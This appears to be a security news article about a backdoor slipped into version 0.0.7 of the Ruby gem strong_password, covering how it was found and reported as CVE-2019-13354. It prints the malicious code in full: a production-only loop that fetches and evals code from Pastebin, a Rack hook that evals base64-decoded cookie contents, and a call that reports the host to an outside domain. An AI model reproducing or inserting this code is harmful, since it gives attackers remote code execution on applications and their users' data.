Backdoor discovered in a Ruby library checking for strong passwords

A backdoor was discovered in a popular Ruby library which is mainly used to check for the strength of the user’s chosen passwords named “strong_password“.

The backdoor which was covered in the code checked if the library code was being used in a test or production environment. If in the production environment, another malicious code was downloaded through a text hosting platform, Pastebin.com.

The downloaded malicious code would actually create backdoor in the applications which used the library, hence infecting the users.

def _!;begin;yield;rescue Exception;end;end
_!{Thread.new{loop{_!{sleep
rand*3333;eval(Net::HTTP.get(URI('https://pastebin.com/raw/xa456PFt')))}}}if
Rails.env[0]=="p"}

It was then discovered that the URLs of the infected websites were being sent to “smiley.zzz.com.ua“, and then waited for further instructions. The instructions were received in form of the cookie files, which the backdoor mechanism unpacked and executed through ‘eval’ function.

_! {
unless defined?(Z1)
  Rack::Sendfile.prepend Module.new{define_method(:call){|e|
  _!{eval(Base64.urlsafe_decode64(e['HTTP_COOKIE'].match(/___id=(.+);/)[1]))}
  super(e)}}
  Z1 = "(:"
end
}

_! {
  Faraday.get("http://smiley.zzz.com.ua", { "x" => ENV["URL_HOST"].to_s })

The library was never uploaded with the backdoor on GitHub, the hacker managed to replace the library’s owner with himself on RubyGem. A newer version was then released, version 0.0.7 of strong_password, which consisted of the backdoor which was then downloaded 537 times according to the RubyGem stats.

This backdoor was originally uncovered by Tute Costa, a developer who performed a security audit before updating the dependencies used in his production environment. The developer immediately contacted the Ruby’s security team along with the library’s author to let them know of it, and was assigned ‘CVE-2019-13354’ for discovering it.

As this Ruby library was mainly used on websites and applications which involved user accounts, as it enhanced the authentication process. Hence, this clearly shows that any library which has to be used for such critical component in an app should go through proper security audit ensuring user’s data safety.

Backdoor often serves different purposes, as backdoor in Huawei equipment was discovered before which might have helped the Chinese government in spying. Hence, backdoor may serve differently, yet results in the infected system being in constant compromised state.

Leave a Reply

Your email address will not be published. Required fields are marked *